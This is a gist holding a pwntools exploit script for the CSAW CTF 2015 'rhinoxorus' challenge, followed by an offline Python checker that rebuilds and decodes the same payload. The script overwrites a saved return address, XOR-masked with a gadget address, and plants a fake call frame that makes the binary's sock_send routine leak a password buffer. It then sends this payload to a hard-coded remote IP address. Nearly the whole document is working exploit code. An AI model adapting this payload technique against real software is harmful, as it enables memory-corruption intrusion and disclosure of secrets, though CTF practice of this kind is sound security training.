@rekkusu
Created September 20, 2015 23:02
[CSAW CTF 2015] Exploit 500 rhinoxorus
from pwn import *

# Addresses in the challenge binary (32-bit, fixed load address), as given by the author.
ret_addr  = 0x8056afa   # where execution should land after the overflow
pop2ret   = 0x80578fa   # pop; pop; ret gadget (defined but unused in this payload)
leaveret  = 0x804889f   # leave; ret gadget, also used as the XOR mask below
password  = 0x805f0c0   # address of the password buffer that gets sent back
sock_send = 0x804884b   # the routine the author labels sock_send

s = remote('54.152.37.20', 24242)

payload = [
    p32(0xe1),
    p32(0),
    p32(0),
    p32(0),
    p32(0),
    p32(0x180),                # ebp
    p32(ret_addr ^ leaveret),  # return slot, XOR-masked with leaveret
    p32(0),
    p32(6 ^ 0xa4),             # length == 1
    p32(0),
    p32(0) * 10,
    p32(0) * 16,
    # fake call frame: sock_send(4, password, 0x40), presumably (fd, buf, len),
    # with a null return address after it
    p32(sock_send),
    p32(0),
    p32(4),
    p32(password),
    p32(0x40),
]

payload_len = sum(len(x) for x in payload)
print(hex(payload_len))        # sanity check: 164 bytes (0xa4) in total

payload = b''.join(payload)    # p32() returns bytes under Python 3 pwntools
s.send(payload)
s.interactive()
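As an added offline check that is not part of the gist: the script below rebuilds the same payload from named fields using only the standard library (a local p32 stands in for the pwntools one), reports each field's byte offset, and verifies that the masked return slot XORs back to ret_addr and that the trailing fake frame reads back as sock_send(4, password, 0x40). The field names and the assumption that the binary un-masks the return slot with the same key are mine; the addresses and constants are the author's.

```python
import struct

# Constants copied from the exploit script above; the XOR key is the
# leave;ret gadget address, exactly as the script uses it.
RET_ADDR  = 0x8056afa
LEAVERET  = 0x804889f
PASSWORD  = 0x805f0c0
SOCK_SEND = 0x804884b


def p32(v):
    """Little-endian 32-bit pack (stand-in for pwntools' p32)."""
    return struct.pack('<I', v & 0xffffffff)


def u32(b):
    """Little-endian 32-bit unpack of a 4-byte slice."""
    return struct.unpack('<I', b)[0]


def build_payload(ret_addr=RET_ADDR, xor_key=LEAVERET):
    """Rebuild the gist's payload with named fields.

    Returns (payload_bytes, offsets) where offsets maps each field name to
    its byte offset. Field names are my own labels; values are the author's.
    """
    fields = [
        ('hdr',       p32(0xe1)),
        ('pad0',      p32(0) * 4),
        ('saved_ebp', p32(0x180)),
        ('ret',       p32(ret_addr ^ xor_key)),   # masked return address
        ('pad1',      p32(0)),
        ('len',       p32(6 ^ 0xa4)),
        ('pad2',      p32(0) * 27),               # 1 + 10 + 16 zero words
        ('frame_fn',  p32(SOCK_SEND)),            # fake frame: sock_send(...)
        ('frame_ret', p32(0)),
        ('arg0',      p32(4)),
        ('arg1',      p32(PASSWORD)),
        ('arg2',      p32(0x40)),
    ]
    offsets, off = {}, 0
    for name, chunk in fields:
        offsets[name] = off
        off += len(chunk)
    return b''.join(chunk for _, chunk in fields), offsets


def decode_ret(payload, offsets, xor_key=LEAVERET):
    """Undo the XOR mask on the return slot: the address the CPU would
    jump to if the binary XORs that slot with xor_key before returning
    (assumption about the target; the script only shows the masking)."""
    o = offsets['ret']
    return u32(payload[o:o + 4]) ^ xor_key


def parse_fake_frame(payload, offsets):
    """Read back the trailing call frame as (function, return, args)."""
    o = offsets['frame_fn']
    words = [u32(payload[o + 4 * i:o + 4 * i + 4]) for i in range(5)]
    return words[0], words[1], tuple(words[2:])


def layout(payload, offsets):
    """(offset, field, first word) rows for eyeballing the frame before
    sending it anywhere."""
    rows = []
    for name in sorted(offsets, key=offsets.get):
        o = offsets[name]
        rows.append((o, name, u32(payload[o:o + 4])))
    return rows


if __name__ == '__main__':
    pl, offs = build_payload()
    print('payload length: %#x' % len(pl))
    for off, name, word in layout(pl, offs):
        print('%#06x  %-10s %#010x' % (off, name, word))
    print('ret slot decodes to %#x' % decode_ret(pl, offs))
    print('fake frame: %r' % (parse_fake_frame(pl, offs),))
```

Run it without arguments to print the layout; the total comes to 0xa4 (164) bytes, the return slot sits at offset 24 and the fake frame starts at offset 144. Changing ret_addr or xor_key in build_payload lets you re-target the frame and re-check the decode without touching the live script.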